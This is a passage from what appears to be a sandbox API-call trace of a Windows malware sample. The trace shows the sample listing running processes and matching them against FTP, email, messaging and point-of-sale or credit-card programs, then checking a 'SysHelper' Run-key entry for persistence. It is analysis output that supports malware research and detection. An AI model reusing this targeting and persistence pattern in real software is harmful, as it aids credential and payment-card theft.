hModule=0x1330000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0091.339] CloseHandle (hObject=0x4e8) returned 1 [0091.339] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc8) returned 0x4e8 [0091.339] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.341] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0091.341] CloseHandle (hObject=0x4e8) returned 1 [0091.341] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd0) returned 0x4e8 [0091.341] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.343] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xaa0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0091.343] CloseHandle (hObject=0x4e8) returned 1 [0091.343] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd8) returned 0x4e8 [0091.343] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.345] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xeb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0091.345] CloseHandle (hObject=0x4e8) returned 1 [0091.345] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe0) returned 0x4e8 [0091.345] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.346] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0091.347] CloseHandle (hObject=0x4e8) returned 1 [0091.347] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe8) returned 0x4e8 [0091.347] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.348] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x800000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0091.349] CloseHandle (hObject=0x4e8) returned 1 [0091.349] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf0) returned 0x4e8 [0091.349] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.350] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x920000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0091.351] CloseHandle (hObject=0x4e8) returned 1 [0091.351] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf8) returned 0x4e8 [0091.351] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.352] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1020000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0091.353] CloseHandle (hObject=0x4e8) returned 1 [0091.353] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e0) returned 0x4e8 [0091.353] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.354] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x380000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0091.355] CloseHandle (hObject=0x4e8) returned 1 [0091.355] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x4e8 [0091.355] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.356] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0091.356] CloseHandle (hObject=0x4e8) returned 1 [0091.357] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d0) returned 0x4e8 [0091.357] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.358] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0091.358] CloseHandle (hObject=0x4e8) returned 1 [0091.358] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x324) returned 0x4e8 [0091.358] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.360] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0091.360] CloseHandle (hObject=0x4e8) returned 1 [0091.360] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x4e8 [0091.360] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.362] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xaf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0091.362] CloseHandle (hObject=0x4e8) returned 1 [0091.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x224) returned 0x4e8 [0091.362] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.364] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb90000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0091.364] CloseHandle (hObject=0x4e8) returned 1 [0091.364] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x138) returned 0x4e8 [0091.364] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.366] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0091.366] CloseHandle (hObject=0x4e8) returned 1 [0091.366] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x284) returned 0x4e8 [0091.366] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.368] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0091.368] CloseHandle (hObject=0x4e8) returned 1 [0091.368] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x4e8 [0091.368] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.370] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0091.370] CloseHandle (hObject=0x4e8) returned 1 [0091.370] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x4e8 [0091.370] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.372] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x8f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0091.372] CloseHandle (hObject=0x4e8) returned 1 [0091.372] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x4e8 [0091.372] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.374] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x160000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0091.374] CloseHandle (hObject=0x4e8) returned 1 [0091.374] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x4e8 [0091.374] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.376] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1250000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0091.376] CloseHandle (hObject=0x4e8) returned 1 [0091.376] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x4e8 [0091.376] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.378] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0091.378] CloseHandle (hObject=0x4e8) returned 1 [0091.378] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x4e8 [0091.378] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.379] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x8a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0091.380] CloseHandle (hObject=0x4e8) returned 1 [0091.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x4e8 [0091.380] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.381] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xdf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0091.382] CloseHandle (hObject=0x4e8) returned 1 [0091.382] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x4e8 [0091.382] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.383] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1290000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0091.384] CloseHandle (hObject=0x4e8) returned 1 [0091.384] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x4e8 [0091.384] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.385] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x9d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0091.386] CloseHandle (hObject=0x4e8) returned 1 [0091.386] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x4e8 [0091.386] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.387] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa30000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0091.387] CloseHandle (hObject=0x4e8) returned 1 [0091.388] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae4) returned 0x4e8 [0091.388] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.389] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x40000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0091.389] CloseHandle (hObject=0x4e8) returned 1 [0091.389] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaec) returned 0x4e8 [0091.390] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.391] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="consumer_door.exe") returned 0x11 [0091.391] CloseHandle (hObject=0x4e8) returned 1 [0091.391] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf4) returned 0x4e8 [0091.391] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.393] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="too_no.exe") returned 0xa [0091.393] CloseHandle (hObject=0x4e8) returned 1 [0091.393] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb14) returned 0x4e8 [0091.393] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.395] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x900000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pass.exe") returned 0x8 [0091.395] CloseHandle (hObject=0x4e8) returned 1 [0091.395] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb1c) returned 0x4e8 [0091.395] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.397] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1070000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0091.397] CloseHandle (hObject=0x4e8) returned 1 [0091.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb24) returned 0x4e8 [0091.397] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.399] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1070000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0091.399] CloseHandle (hObject=0x4e8) returned 1 [0091.399] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb2c) returned 0x4e8 [0091.399] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.401] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0091.401] CloseHandle (hObject=0x4e8) returned 1 [0091.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb34) returned 0x4e8 [0091.401] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.403] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x130000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0091.403] CloseHandle (hObject=0x4e8) returned 1 [0091.403] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb3c) returned 0x4e8 [0091.403] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.407] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x820000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0091.407] CloseHandle (hObject=0x4e8) returned 1 [0091.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb44) returned 0x4e8 [0091.407] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.409] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x13a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0091.409] CloseHandle (hObject=0x4e8) returned 1 [0091.409] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb4c) returned 0x4e8 [0091.409] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.411] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xcb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0091.411] CloseHandle (hObject=0x4e8) returned 1 [0091.411] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb54) returned 0x4e8 [0091.411] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.413] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1080000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0091.413] CloseHandle (hObject=0x4e8) returned 1 [0091.413] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb5c) returned 0x4e8 [0091.413] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.415] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1160000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0091.415] CloseHandle (hObject=0x4e8) returned 1 [0091.415] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb64) returned 0x4e8 [0091.415] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.417] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x100000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0091.417] CloseHandle (hObject=0x4e8) returned 1 [0091.417] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb70) returned 0x4e8 [0091.417] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.419] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xaf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0091.419] CloseHandle (hObject=0x4e8) returned 1 [0091.419] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x4e8 [0091.421] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.422] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x12b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0091.423] CloseHandle (hObject=0x4e8) returned 1 [0091.423] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac4) returned 0x4e8 [0091.423] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.424] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0091.424] CloseHandle (hObject=0x4e8) returned 1 [0091.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x4e8 [0091.425] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.426] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x880000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0091.426] CloseHandle (hObject=0x4e8) returned 1 [0091.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x4e8 [0091.426] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.428] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xf60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0091.428] CloseHandle (hObject=0x4e8) returned 1 [0091.428] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc50) returned 0x0 [0091.428] CloseHandle (hObject=0x0) returned 0 [0091.428] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc70) returned 0x0 [0091.429] CloseHandle (hObject=0x0) returned 0 [0091.429] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe50) returned 0x0 [0091.429] CloseHandle (hObject=0x0) returned 0 [0091.429] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xee8) returned 0x4e8 [0091.429] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0091.431] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 0x44 [0091.431] CloseHandle (hObject=0x4e8) returned 1 [0091.439] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x28) returned 0x729e10 [0091.439] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x737600 [0091.439] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2c11960 [0091.439] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2c154a0 [0091.439] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2bc9908 [0091.439] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2bd8a50 [0091.439] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2bd8cb8 [0091.440] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2bd8f20 [0091.440] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2bd9188 [0091.440] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2bd93f0 [0091.440] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x25c) returned 0x2bd9658 [0091.457] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4e8) returned 0x0 [0091.457] RegQueryValueExW (in: hKey=0x4e8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x0, lpData=0x18d168*=0x0, lpcbData=0x18ea20*=0x400) returned 0x2 [0091.457] RegCloseKey (hKey=0x4e8) returned 0x0 [0091.457] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75be0000 [0091.458] GetProcAddress (hModule=0x75be0000, lpProcName="SHGetFolderPathW") returned 0x75c65708 [0091.459] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" " [0091.459] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" ", pNumArgs=0x18ea04 | out: pNumArgs=0x18ea04) returned 0x7d0ae0*="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0091.459] lstrcpyW (in: lpString1=0x18c968, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0091.459] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0091.459] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18e168 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0091.459] UuidCreate (in: Uuid=0x18e9b4 | out: Uuid=0x18e9b4) returned 0x0 [0091.459] UuidToStringW (in: Uuid=0x18e9b4, StringUuid=0x18ea48 | out: StringUuid=0x18ea48) returned 0x0 [0091.459] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x50) returned 0x2c12760 [0091.460] RpcMgmtStatsVectorFree (in: StatsVector=0x18ea48 | out: StatsVector=0x18ea48) returned 0x0 [0091.460] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="4d45d74b-b67c-4b05-9c99-9061295dc2fa" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa") returned 1 [0091.460] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa" (normalized: 